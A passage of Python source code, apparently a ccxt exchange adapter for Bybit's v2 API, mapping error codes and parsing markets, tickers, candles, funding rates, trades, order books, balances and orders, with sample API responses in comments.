'20012': InvalidOrder, # qty must be greater than zero and less than 1 million
'20013': InvalidOrder, # missing parameter price
'20014': InvalidOrder, # price must be greater than 0
'20015': InvalidOrder, # missing parameter time_in_force
'20016': InvalidOrder, # invalid value for parameter time_in_force
'20017': InvalidOrder, # missing parameter order_id
'20018': InvalidOrder, # invalid date format
'20019': InvalidOrder, # missing parameter stop_px
'20020': InvalidOrder, # missing parameter base_price
'20021': InvalidOrder, # missing parameter stop_order_id
'20022': BadRequest, # missing parameter leverage
'20023': BadRequest, # leverage must be a number
'20031': BadRequest, # leverage must be greater than zero
'20070': BadRequest, # missing parameter margin
'20071': BadRequest, # margin must be greater than zero
'20084': BadRequest, # order_id or order_link_id is required
'30001': BadRequest, # order_link_id is repeated
'30003': InvalidOrder, # qty must be more than the minimum allowed
'30004': InvalidOrder, # qty must be less than the maximum allowed
'30005': InvalidOrder, # price exceeds maximum allowed
'30007': InvalidOrder, # price exceeds minimum allowed
'30008': InvalidOrder, # invalid order_type
'30009': ExchangeError, # no position found
'30010': InsufficientFunds, # insufficient wallet balance
'30011': PermissionDenied, # operation not allowed as position is undergoing liquidation
'30012': PermissionDenied, # operation not allowed as position is undergoing ADL
'30013': PermissionDenied, # position is in liq or adl status
'30014': InvalidOrder, # invalid closing order, qty should not greater than size
'30015': InvalidOrder, # invalid closing order, side should be opposite
'30016': ExchangeError, # TS and SL must be cancelled first while closing position
'30017': InvalidOrder, # estimated fill price cannot be lower than current Buy liq_price
'30018': InvalidOrder, # estimated fill price cannot be higher than current Sell liq_price
'30019': InvalidOrder, # cannot attach TP/SL params for non-zero position when placing non-opening position order
'30020': InvalidOrder, # position already has TP/SL params
'30021': InvalidOrder, # cannot afford estimated position_margin
'30022': InvalidOrder, # estimated buy liq_price cannot be higher than current mark_price
'30023': InvalidOrder, # estimated sell liq_price cannot be lower than current mark_price
'30024': InvalidOrder, # cannot set TP/SL/TS for zero-position
'30025': InvalidOrder, # trigger price should bigger than 10% of last price
'30026': InvalidOrder, # price too high
'30027': InvalidOrder, # price set for Take profit should be higher than Last Traded Price
'30028': InvalidOrder, # price set for Stop loss should be between Liquidation price and Last Traded Price
'30029': InvalidOrder, # price set for Stop loss should be between Last Traded Price and Liquidation price
'30030': InvalidOrder, # price set for Take profit should be lower than Last Traded Price
'30031': InsufficientFunds, # insufficient available balance for order cost
'30032': InvalidOrder, # order has been filled or cancelled
'30033': RateLimitExceeded, # The number of stop orders exceeds maximum limit allowed
'30034': OrderNotFound, # no order found
'30035': RateLimitExceeded, # too fast to cancel
'30036': ExchangeError, # the expected position value after order execution exceeds the current risk limit
'30037': InvalidOrder, # order already cancelled
'30041': ExchangeError, # no position found
'30042': InsufficientFunds, # insufficient wallet balance
'30043': InvalidOrder, # operation not allowed as position is undergoing liquidation
'30044': InvalidOrder, # operation not allowed as position is undergoing AD
'30045': InvalidOrder, # operation not allowed as position is not normal status
'30049': InsufficientFunds, # insufficient available balance
'30050': ExchangeError, # any adjustments made will trigger immediate liquidation
'30051': ExchangeError, # due to risk limit, cannot adjust leverage
'30052': ExchangeError, # leverage can not less than 1
'30054': ExchangeError, # position margin is invalid
'30057': ExchangeError, # requested quantity of contracts exceeds risk limit
'30063': ExchangeError, # reduce-only rule not satisfied
'30067': InsufficientFunds, # insufficient available balance
'30068': ExchangeError, # exit value must be positive
'30074': InvalidOrder, # can't create the stop order, because you expect the order will be triggered when the LastPrice(or IndexPrice、 MarkPrice, determined by trigger_by) is raising to stop_px, but the LastPrice(or IndexPrice、 MarkPrice) is already equal to or greater than stop_px, please adjust base_price or stop_px
'30075': InvalidOrder, # can't create the stop order, because you expect the order will be triggered when the LastPrice(or IndexPrice、 MarkPrice, determined by trigger_by) is falling to stop_px, but the LastPrice(or IndexPrice、 MarkPrice) is already equal to or less than stop_px, please adjust base_price or stop_px
'33004': AuthenticationError, # apikey already expired
'34026': ExchangeError, # the limit is no change
},
'broad': {
'unknown orderInfo': OrderNotFound, # {"ret_code":-1,"ret_msg":"unknown orderInfo","ext_code":"","ext_info":"","result":null,"time_now":"1584030414.005545","rate_limit_status":99,"rate_limit_reset_ms":1584030414003,"rate_limit":100}
'invalid api_key': AuthenticationError, # {"ret_code":10003,"ret_msg":"invalid api_key","ext_code":"","ext_info":"","result":null,"time_now":"1599547085.415797"}
},
},
'precisionMode': TICK_SIZE,
'options': {
'marketTypes': {
'BTC/USDT': 'linear',
'ETH/USDT': 'linear',
'BNB/USDT': 'linear',
'ADA/USDT': 'linear',
'DOGE/USDT': 'linear',
'XRP/USDT': 'linear',
'DOT/USDT': 'linear',
'UNI/USDT': 'linear',
'BCH/USDT': 'linear',
'LTC/USDT': 'linear',
'SOL/USDT': 'linear',
'LINK/USDT': 'linear',
'MATIC/USDT': 'linear',
'ETC/USDT': 'linear',
'FIL/USDT': 'linear',
'EOS/USDT': 'linear',
'AAVE/USDT': 'linear',
'XTZ/USDT': 'linear',
'SUSHI/USDT': 'linear',
'XEM/USDT': 'linear',
'BTC/USD': 'inverse',
'ETH/USD': 'inverse',
'EOS/USD': 'inverse',
'XRP/USD': 'inverse',
},
'defaultType': 'linear', # linear, inverse, futures
'code': 'BTC',
'cancelAllOrders': {
# 'method': 'v2PrivatePostOrderCancelAll', # v2PrivatePostStopOrderCancelAll
},
'recvWindow': 5 * 1000, # 5 sec default
'timeDifference': 0, # the difference between system clock and exchange server clock
'adjustForTimeDifference': False, # controls the adjustment logic upon instantiation
},
'fees': {
'trading': {
'tierBased': False,
'percentage': True,
'taker': 0.00075,
'maker': -0.00025,
},
'funding': {
'tierBased': False,
'percentage': False,
'withdraw': {},
'deposit': {},
},
},
})
def nonce(self):
return self.milliseconds() - self.options['timeDifference']
def load_time_difference(self, params={}):
serverTime = self.fetch_time(params)
after = self.milliseconds()
self.options['timeDifference'] = after - serverTime
return self.options['timeDifference']
def fetch_time(self, params={}):
response = self.v2PublicGetTime(params)
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: {},
# time_now: '1583933682.448826'
# }
#
return self.safe_timestamp(response, 'time_now')
    def fetch_markets(self, params={}):
        """
        Retrieve the list of markets(contracts) from the exchange and build
        unified market structures.

        :param dict params: extra parameters passed through to the endpoint
        :returns list: a list of unified market dicts
        """
        if self.options['adjustForTimeDifference']:
            self.load_time_difference()
        response = self.v2PublicGetSymbols(params)
        #
        # {
        #     "ret_code":0,
        #     "ret_msg":"OK",
        #     "ext_code":"",
        #     "ext_info":"",
        #     "result":[
        #         {
        #             "name":"BTCUSD",
        #             "alias":"BTCUSD",
        #             "status":"Trading",
        #             "base_currency":"BTC",
        #             "quote_currency":"USD",
        #             "price_scale":2,
        #             "taker_fee":"0.00075",
        #             "maker_fee":"-0.00025",
        #             "leverage_filter":{"min_leverage":1,"max_leverage":100,"leverage_step":"0.01"},
        #             "price_filter":{"min_price":"0.5","max_price":"999999.5","tick_size":"0.5"},
        #             "lot_size_filter":{"max_trading_qty":1000000,"min_trading_qty":1,"qty_step":1}
        #         },
        #         {
        #             "name":"BTCUSDT",
        #             "alias":"BTCUSDT",
        #             "status":"Trading",
        #             "base_currency":"BTC",
        #             "quote_currency":"USDT",
        #             "price_scale":2,
        #             "taker_fee":"0.00075",
        #             "maker_fee":"-0.00025",
        #             "leverage_filter":{"min_leverage":1,"max_leverage":100,"leverage_step":"0.01"},
        #             "price_filter":{"min_price":"0.5","max_price":"999999.5","tick_size":"0.5"},
        #             "lot_size_filter":{"max_trading_qty":100,"min_trading_qty":0.001,"qty_step":0.001}
        #         },
        #     ],
        #     "time_now":"1610539664.818033"
        # }
        #
        markets = self.safe_value(response, 'result', [])
        options = self.safe_value(self.options, 'fetchMarkets', {})
        # quote currencies in this map mark a market as "linear"(settled in
        # the quote, e.g. USDT); everything else is treated as inverse
        linearQuoteCurrencies = self.safe_value(options, 'linear', {'USDT': True})
        result = []
        for i in range(0, len(markets)):
            market = markets[i]
            id = self.safe_string_2(market, 'name', 'symbol')
            baseId = self.safe_string(market, 'base_currency')
            quoteId = self.safe_string(market, 'quote_currency')
            base = self.safe_currency_code(baseId)
            quote = self.safe_currency_code(quoteId)
            linear = (quote in linearQuoteCurrencies)
            inverse = not linear
            symbol = base + '/' + quote
            baseQuote = base + quote
            type = 'swap'
            # if the id is not simply base+quote(e.g. a dated contract code),
            # treat the market as a futures contract and use the raw id as symbol
            if baseQuote != id:
                symbol = id
                type = 'futures'
            lotSizeFilter = self.safe_value(market, 'lot_size_filter', {})
            priceFilter = self.safe_value(market, 'price_filter', {})
            # precision values are step sizes(TICK_SIZE mode), not digit counts
            precision = {
                'amount': self.safe_number(lotSizeFilter, 'qty_step'),
                'price': self.safe_number(priceFilter, 'tick_size'),
            }
            leverage = self.safe_value(market, 'leverage_filter', {})
            status = self.safe_string(market, 'status')
            active = None
            if status is not None:
                active = (status == 'Trading')
            spot = (type == 'spot')
            swap = (type == 'swap')
            futures = (type == 'futures')
            option = (type == 'option')
            result.append({
                'id': id,
                'symbol': symbol,
                'base': base,
                'quote': quote,
                'active': active,
                'precision': precision,
                'taker': self.safe_number(market, 'taker_fee'),
                'maker': self.safe_number(market, 'maker_fee'),
                'type': type,
                'spot': spot,
                'swap': swap,
                'futures': futures,
                'option': option,
                'linear': linear,
                'inverse': inverse,
                'limits': {
                    'amount': {
                        'min': self.safe_number(lotSizeFilter, 'min_trading_qty'),
                        'max': self.safe_number(lotSizeFilter, 'max_trading_qty'),
                    },
                    'price': {
                        'min': self.safe_number(priceFilter, 'min_price'),
                        'max': self.safe_number(priceFilter, 'max_price'),
                    },
                    'cost': {
                        'min': None,
                        'max': None,
                    },
                    'leverage': {
                        'max': self.safe_number(leverage, 'max_leverage', 1),
                    },
                },
                'info': market,
            })
        return result
def parse_ticker(self, ticker, market=None):
#
# fetchTicker
#
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
#
timestamp = None
marketId = self.safe_string(ticker, 'symbol')
symbol = self.safe_symbol(marketId, market)
last = self.safe_number(ticker, 'last_price')
open = self.safe_number(ticker, 'prev_price_24h')
percentage = self.safe_number(ticker, 'price_24h_pcnt')
if percentage is not None:
percentage *= 100
change = None
average = None
if (last is not None) and (open is not None):
change = last - open
average = self.sum(open, last) / 2
baseVolume = self.safe_number(ticker, 'turnover_24h')
quoteVolume = self.safe_number(ticker, 'volume_24h')
vwap = self.vwap(baseVolume, quoteVolume)
return {
'symbol': symbol,
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'high': self.safe_number(ticker, 'high_price_24h'),
'low': self.safe_number(ticker, 'low_price_24h'),
'bid': self.safe_number(ticker, 'bid_price'),
'bidVolume': None,
'ask': self.safe_number(ticker, 'ask_price'),
'askVolume': None,
'vwap': vwap,
'open': open,
'close': last,
'last': last,
'previousClose': None,
'change': change,
'percentage': percentage,
'average': average,
'baseVolume': baseVolume,
'quoteVolume': quoteVolume,
'info': ticker,
}
def fetch_ticker(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.v2PublicGetTickers(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
# ],
# time_now: '1583948195.818255'
# }
#
result = self.safe_value(response, 'result', [])
first = self.safe_value(result, 0)
timestamp = self.safe_timestamp(response, 'time_now')
ticker = self.parse_ticker(first, market)
ticker['timestamp'] = timestamp
ticker['datetime'] = self.iso8601(timestamp)
return ticker
def fetch_tickers(self, symbols=None, params={}):
self.load_markets()
response = self.v2PublicGetTickers(params)
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# symbol: 'BTCUSD',
# bid_price: '7680',
# ask_price: '7680.5',
# last_price: '7680.00',
# last_tick_direction: 'MinusTick',
# prev_price_24h: '7870.50',
# price_24h_pcnt: '-0.024204',
# high_price_24h: '8035.00',
# low_price_24h: '7671.00',
# prev_price_1h: '7780.00',
# price_1h_pcnt: '-0.012853',
# mark_price: '7683.27',
# index_price: '7682.74',
# open_interest: 188829147,
# open_value: '23670.06',
# total_turnover: '25744224.90',
# turnover_24h: '102997.83',
# total_volume: 225448878806,
# volume_24h: 809919408,
# funding_rate: '0.0001',
# predicted_funding_rate: '0.0001',
# next_funding_time: '2020-03-12T00:00:00Z',
# countdown_hour: 7
# }
# ],
# time_now: '1583948195.818255'
# }
#
result = self.safe_value(response, 'result', [])
tickers = {}
for i in range(0, len(result)):
ticker = self.parse_ticker(result[i])
symbol = ticker['symbol']
tickers[symbol] = ticker
return self.filter_by_array(tickers, 'symbol', symbols)
def parse_ohlcv(self, ohlcv, market=None):
#
# inverse perpetual BTC/USD
#
# {
# symbol: 'BTCUSD',
# interval: '1',
# open_time: 1583952540,
# open: '7760.5',
# high: '7764',
# low: '7757',
# close: '7763.5',
# volume: '1259766',
# turnover: '162.32773718999994'
# }
#
# linear perpetual BTC/USDT
#
# {
# "id":143536,
# "symbol":"BTCUSDT",
# "period":"15",
# "start_at":1587883500,
# "volume":1.035,
# "open":7540.5,
# "high":7541,
# "low":7540.5,
# "close":7541
# }
#
return [
self.safe_timestamp_2(ohlcv, 'open_time', 'start_at'),
self.safe_number(ohlcv, 'open'),
self.safe_number(ohlcv, 'high'),
self.safe_number(ohlcv, 'low'),
self.safe_number(ohlcv, 'close'),
self.safe_number_2(ohlcv, 'turnover', 'volume'),
]
    def fetch_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
        """
        Fetch kline/candlestick data for a symbol.

        :param str symbol: unified market symbol
        :param str timeframe: unified timeframe key(must exist in self.timeframes)
        :param int since: start time in milliseconds; if omitted, limit is required
        :param int limit: number of candles(max 200, default 200)
        :param dict params: extra parameters; a 'price' value of 'mark', 'index'
            or 'premiumIndex' selects the corresponding price-kline endpoint
        :returns list: a list of [timestamp, open, high, low, close, volume]
        """
        self.load_markets()
        market = self.market(symbol)
        price = self.safe_string(params, 'price')
        params = self.omit(params, 'price')
        request = {
            'symbol': market['id'],
            'interval': self.timeframes[timeframe],
        }
        duration = self.parse_timeframe(timeframe)
        now = self.seconds()
        # the endpoint has no "to" parameter, so a window must be anchored by
        # "from"; derive it from limit when the caller gave no explicit since
        if since is None:
            if limit is None:
                raise ArgumentsRequired(self.id + ' fetchOHLCV() requires a since argument or a limit argument')
            else:
                request['from'] = now - limit * duration
        else:
            request['from'] = int(since / 1000)  # the API expects seconds
        if limit is not None:
            request['limit'] = limit  # max 200, default 200
        # select the endpoint: price-kline variants take precedence over the
        # linear-vs-inverse split for last-traded-price klines
        method = 'v2PublicGetKlineList'
        if price == 'mark':
            method = 'v2PublicGetMarkPriceKline'
        elif price == 'index':
            method = 'v2PublicGetIndexPriceKline'
        elif price == 'premiumIndex':
            method = 'v2PublicGetPremiumIndexKline'
        elif market['linear']:
            method = 'publicLinearGetKline'
        response = getattr(self, method)(self.extend(request, params))
        #
        # inverse perpetual BTC/USD
        #
        # {
        #     ret_code: 0,
        #     ret_msg: 'OK',
        #     ext_code: '',
        #     ext_info: '',
        #     result: [
        #         {
        #             symbol: 'BTCUSD',
        #             interval: '1',
        #             open_time: 1583952540,
        #             open: '7760.5',
        #             high: '7764',
        #             low: '7757',
        #             close: '7763.5',
        #             volume: '1259766',
        #             turnover: '162.32773718999994'
        #         },
        #     ],
        #     time_now: '1583953082.397330'
        # }
        #
        # linear perpetual BTC/USDT
        #
        # {
        #     "ret_code":0,
        #     "ret_msg":"OK",
        #     "ext_code":"",
        #     "ext_info":"",
        #     "result":[
        #         {
        #             "id":143536,
        #             "symbol":"BTCUSDT",
        #             "period":"15",
        #             "start_at":1587883500,
        #             "volume":1.035,
        #             "open":7540.5,
        #             "high":7541,
        #             "low":7540.5,
        #             "close":7541
        #         }
        #     ],
        #     "time_now":"1587884120.168077"
        # }
        #
        result = self.safe_value(response, 'result', {})
        return self.parse_ohlcvs(result, market, timeframe, since, limit)
def fetch_funding_rate(self, symbol, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
method = 'publicLinearGetFundingPrevFundingRate' if market['linear'] else 'v2PublicGetFundingPrevFundingRate'
response = getattr(self, method)(self.extend(request, params))
#
# {
# "ret_code": 0,
# "ret_msg": "ok",
# "ext_code": "",
# "result": {
# "symbol": "BTCUSD",
# "funding_rate": "0.00010000",
# "funding_rate_timestamp": 1577433600
# },
# "ext_info": null,
# "time_now": "1577445586.446797",
# "rate_limit_status": 119,
# "rate_limit_reset_ms": 1577445586454,
# "rate_limit": 120
# }
#
result = self.safe_value(response, 'result')
nextFundingRate = self.safe_number(result, 'funding_rate')
previousFundingTime = self.safe_integer(result, 'funding_rate_timestamp') * 1000
nextFundingTime = previousFundingTime + (8 * 3600000)
currentTime = self.milliseconds()
return {
'info': result,
'symbol': symbol,
'markPrice': None,
'indexPrice': None,
'interestRate': None,
'estimatedSettlePrice': None,
'timestamp': currentTime,
'datetime': self.iso8601(currentTime),
'previousFundingRate': None,
'nextFundingRate': nextFundingRate,
'previousFundingTimestamp': previousFundingTime,
'nextFundingTimestamp': nextFundingTime,
'previousFundingDatetime': self.iso8601(previousFundingTime),
'nextFundingDatetime': self.iso8601(nextFundingTime),
}
def fetch_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchIndexOHLCV() requires a since argument or a limit argument')
request = {
'price': 'index',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_mark_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchMarkOHLCV() requires a since argument or a limit argument')
request = {
'price': 'mark',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
def fetch_premium_index_ohlcv(self, symbol, timeframe='1m', since=None, limit=None, params={}):
if since is None and limit is None:
raise ArgumentsRequired(self.id + ' fetchPremiumIndexOHLCV() requires a since argument or a limit argument')
request = {
'price': 'premiumIndex',
}
return self.fetch_ohlcv(symbol, timeframe, since, limit, self.extend(request, params))
    def parse_trade(self, trade, market=None):
        """
        Build a unified trade structure from either a public trade row or a
        private execution record.

        :param dict trade: the raw trade/execution dict(two shapes, see below)
        :param dict market: optional unified market used to resolve the symbol
        :returns dict: a unified ccxt trade
        """
        #
        # fetchTrades(public)
        #
        # {
        #     id: 43785688,
        #     symbol: 'BTCUSD',
        #     price: 7786,
        #     qty: 67,
        #     side: 'Sell',
        #     time: '2020-03-11T19:18:30.123Z'
        # }
        #
        # fetchMyTrades, fetchOrderTrades(private)
        #
        # {
        #     "closed_size": 0,
        #     "cross_seq": 277136382,
        #     "exec_fee": "0.0000001",
        #     "exec_id": "256e5ef8-abfe-5772-971b-f944e15e0d68",
        #     "exec_price": "8178.5",
        #     "exec_qty": 1,
        #     # the docs say the exec_time field is "abandoned" now
        #     # the user should use "trade_time_ms"
        #     "exec_time": "1571676941.70682",
        #     "exec_type": "Trade", #Exec Type Enum
        #     "exec_value": "0.00012227",
        #     "fee_rate": "0.00075",
        #     "last_liquidity_ind": "RemovedLiquidity", #Liquidity Enum
        #     "leaves_qty": 0,
        #     "nth_fill": 2,
        #     "order_id": "7ad50cb1-9ad0-4f74-804b-d82a516e1029",
        #     "order_link_id": "",
        #     "order_price": "8178",
        #     "order_qty": 1,
        #     "order_type": "Market", #Order Type Enum
        #     "side": "Buy", #Side Enum
        #     "symbol": "BTCUSD", #Symbol Enum
        #     "user_id": 1,
        #     "trade_time_ms": 1577480599000
        # }
        #
        id = self.safe_string_2(trade, 'id', 'exec_id')
        marketId = self.safe_string(trade, 'symbol')
        market = self.safe_market(marketId, market)
        symbol = market['symbol']
        amountString = self.safe_string_2(trade, 'qty', 'exec_qty')
        priceString = self.safe_string_2(trade, 'exec_price', 'price')
        cost = self.safe_number(trade, 'exec_value')
        amount = self.parse_number(amountString)
        price = self.parse_number(priceString)
        # public trades carry no exec_value, so derive cost = price * amount
        # using string math to avoid float precision artifacts
        if cost is None:
            cost = self.parse_number(Precise.string_mul(priceString, amountString))
        # public rows have an ISO 'time'; private executions use 'trade_time_ms'
        timestamp = self.parse8601(self.safe_string(trade, 'time'))
        if timestamp is None:
            timestamp = self.safe_integer(trade, 'trade_time_ms')
        side = self.safe_string_lower(trade, 'side')
        lastLiquidityInd = self.safe_string(trade, 'last_liquidity_ind')
        takerOrMaker = 'maker' if (lastLiquidityInd == 'AddedLiquidity') else 'taker'
        feeCost = self.safe_number(trade, 'exec_fee')
        fee = None
        if feeCost is not None:
            # inverse contracts pay fees in the base currency, linear in the quote
            feeCurrencyCode = market['base'] if market['inverse'] else market['quote']
            fee = {
                'cost': feeCost,
                'currency': feeCurrencyCode,
                'rate': self.safe_number(trade, 'fee_rate'),
            }
        return {
            'id': id,
            'info': trade,
            'timestamp': timestamp,
            'datetime': self.iso8601(timestamp),
            'symbol': symbol,
            'order': self.safe_string(trade, 'order_id'),
            'type': self.safe_string_lower(trade, 'order_type'),
            'side': side,
            'takerOrMaker': takerOrMaker,
            'price': price,
            'amount': amount,
            'cost': cost,
            'fee': fee,
        }
def fetch_trades(self, symbol, since=None, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
# 'from': 123, # from id
}
if limit is not None:
request['count'] = limit # default 500, max 1000
method = 'publicLinearGetRecentTradingRecords' if market['linear'] else 'v2PublicGetTradingRecords'
response = getattr(self, method)(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {
# id: 43785688,
# symbol: 'BTCUSD',
# price: 7786,
# qty: 67,
# side: 'Sell',
# time: '2020-03-11T19:18:30.123Z'
# },
# ],
# time_now: '1583954313.393362'
# }
#
result = self.safe_value(response, 'result', {})
return self.parse_trades(result, market, since, limit)
def parse_order_book(self, orderbook, symbol, timestamp=None, bidsKey='Buy', asksKey='Sell', priceKey='price', amountKey='size'):
bids = []
asks = []
for i in range(0, len(orderbook)):
bidask = orderbook[i]
side = self.safe_string(bidask, 'side')
if side == 'Buy':
bids.append(self.parse_bid_ask(bidask, priceKey, amountKey))
elif side == 'Sell':
asks.append(self.parse_bid_ask(bidask, priceKey, amountKey))
else:
raise ExchangeError(self.id + ' parseOrderBook encountered an unrecognized bidask format: ' + self.json(bidask))
return {
'symbol': symbol,
'bids': self.sort_by(bids, 0, True),
'asks': self.sort_by(asks, 0),
'timestamp': timestamp,
'datetime': self.iso8601(timestamp),
'nonce': None,
}
def fetch_order_book(self, symbol, limit=None, params={}):
self.load_markets()
market = self.market(symbol)
request = {
'symbol': market['id'],
}
response = self.v2PublicGetOrderBookL2(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: [
# {symbol: 'BTCUSD', price: '7767.5', size: 677956, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7767', size: 580690, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7766.5', size: 475252, side: 'Buy'},
# {symbol: 'BTCUSD', price: '7768', size: 330847, side: 'Sell'},
# {symbol: 'BTCUSD', price: '7768.5', size: 97159, side: 'Sell'},
# {symbol: 'BTCUSD', price: '7769', size: 6508, side: 'Sell'},
# ],
# time_now: '1583954829.874823'
# }
#
result = self.safe_value(response, 'result', [])
timestamp = self.safe_timestamp(response, 'time_now')
return self.parse_order_book(result, symbol, timestamp, 'Buy', 'Sell', 'price', 'size')
def fetch_balance(self, params={}):
self.load_markets()
request = {}
coin = self.safe_string(params, 'coin')
code = self.safe_string(params, 'code')
if coin is not None:
request['coin'] = coin
elif code is not None:
currency = self.currency(code)
request['coin'] = currency['id']
response = self.v2PrivateGetWalletBalance(self.extend(request, params))
#
# {
# ret_code: 0,
# ret_msg: 'OK',
# ext_code: '',
# ext_info: '',
# result: {
# BTC: {
# equity: 0,
# available_balance: 0,
# used_margin: 0,
# order_margin: 0,
# position_margin: 0,
# occ_closing_fee: 0,
# occ_funding_fee: 0,
# wallet_balance: 0,
# realised_pnl: 0,
# unrealised_pnl: 0,
# cum_realised_pnl: 0,
# given_cash: 0,
# service_cash: 0
# }
# },
# time_now: '1583937810.370020',
# rate_limit_status: 119,
# rate_limit_reset_ms: 1583937810367,
# rate_limit: 120
# }
#
result = {
'info': response,
}
balances = self.safe_value(response, 'result', {})
currencyIds = list(balances.keys())
for i in range(0, len(currencyIds)):
currencyId = currencyIds[i]
balance = balances[currencyId]
code = self.safe_currency_code(currencyId)
account = self.account()
account['free'] = self.safe_string(balance, 'available_balance')
account['used'] = self.safe_string(balance, 'used_margin')
account['total'] = self.safe_string(balance, 'equity')
result[code] = account
return self.parse_balance(result)
def parse_order_status(self, status):
statuses = {
# basic orders
'Created': 'open',
'Rejected': 'rejected', # order is triggered but failed upon being placed
'New': 'open',
'PartiallyFilled': 'open',
'Filled': 'closed',
'Cancelled': 'canceled',
'PendingCancel': 'canceling', # the engine has received the cancellation but there is no guarantee that it will be successful
# conditional orders
'Active': 'open', # order is triggered and placed successfully
'Untriggered': 'open', # order waits to be triggered
'Triggered': 'closed', # order is triggered
# 'Cancelled': 'canceled', # order is cancelled
# 'Rejected': 'rejected', # order is triggered but fail to be placed
'Deactivated': 'canceled', # conditional order was cancelled before triggering
}
return self.safe_string(statuses, status, status)
def parse_time_in_force(self, timeInForce):
timeInForces = {
'GoodTillCancel': 'GTC',
'ImmediateOrCancel': 'IOC',
'FillOrKill': 'FOK',
'PostOnly': 'PO',
}
return self.safe_string(timeInForces, timeInForce, timeInForce)
    def parse_order(self, order, market=None):
        """
        Build a unified order structure out of a raw order dict, handling the
        regular-order and conditional(stop)-order shapes shown below.

        :param dict order: the raw order from createOrder / fetchOrder / etc.
        :param dict market: optional unified market used to resolve the symbol
        :returns dict: a unified ccxt order
        """
        #
        # createOrder
        #
        # {
        #     "user_id": 1,
        #     "order_id": "335fd977-e5a5-4781-b6d0-c772d5bfb95b",
        #     "symbol": "BTCUSD",
        #     "side": "Buy",
        #     "order_type": "Limit",
        #     "price": 8800,
        #     "qty": 1,
        #     "time_in_force": "GoodTillCancel",
        #     "order_status": "Created",
        #     "last_exec_time": 0,
        #     "last_exec_price": 0,
        #     "leaves_qty": 1,
        #     "cum_exec_qty": 0, # in contracts, where 1 contract = 1 quote currency unit(USD for inverse contracts)
        #     "cum_exec_value": 0, # in contract's underlying currency(BTC for inverse contracts)
        #     "cum_exec_fee": 0,
        #     "reject_reason": "",
        #     "order_link_id": "",
        #     "created_at": "2019-11-30T11:03:43.452Z",
        #     "updated_at": "2019-11-30T11:03:43.455Z"
        # }
        #
        # fetchOrder
        #
        # {
        #     "user_id" : 599946,
        #     "symbol" : "BTCUSD",
        #     "side" : "Buy",
        #     "order_type" : "Limit",
        #     "price" : "7948",
        #     "qty" : 10,
        #     "time_in_force" : "GoodTillCancel",
        #     "order_status" : "Filled",
        #     "ext_fields" : {
        #         "o_req_num" : -1600687220498,
        #         "xreq_type" : "x_create"
        #     },
        #     "last_exec_time" : "1588150113.968422",
        #     "last_exec_price" : "7948",
        #     "leaves_qty" : 0,
        #     "leaves_value" : "0",
        #     "cum_exec_qty" : 10,
        #     "cum_exec_value" : "0.00125817",
        #     "cum_exec_fee" : "-0.00000031",
        #     "reject_reason" : "",
        #     "cancel_type" : "",
        #     "order_link_id" : "",
        #     "created_at" : "2020-04-29T08:45:24.399146Z",
        #     "updated_at" : "2020-04-29T08:48:33.968422Z",
        #     "order_id" : "dd2504b9-0157-406a-99e1-efa522373944"
        # }
        #
        # conditional order
        #
        # {
        #     "user_id":##,
        #     "symbol":"BTCUSD",
        #     "side":"Buy",
        #     "order_type":"Market",
        #     "price":0,
        #     "qty":10,
        #     "time_in_force":"GoodTillCancel",
        #     "stop_order_type":"Stop",
        #     "trigger_by":"LastPrice",
        #     "base_price":11833,
        #     "order_status":"Untriggered",
        #     "ext_fields":{
        #         "stop_order_type":"Stop",
        #         "trigger_by":"LastPrice",
        #         "base_price":11833,
        #         "expected_direction":"Rising",
        #         "trigger_price":12400,
        #         "close_on_trigger":true,
        #         "op_from":"api",
        #         "remark":"x.x.x.x",
        #         "o_req_num":0
        #     },
        #     "leaves_qty":10,
        #     "leaves_value":0.00080645,
        #     "reject_reason":null,
        #     "cross_seq":-1,
        #     "created_at":"2020-08-21T09:18:48.000Z",
        #     "updated_at":"2020-08-21T09:18:48.000Z",
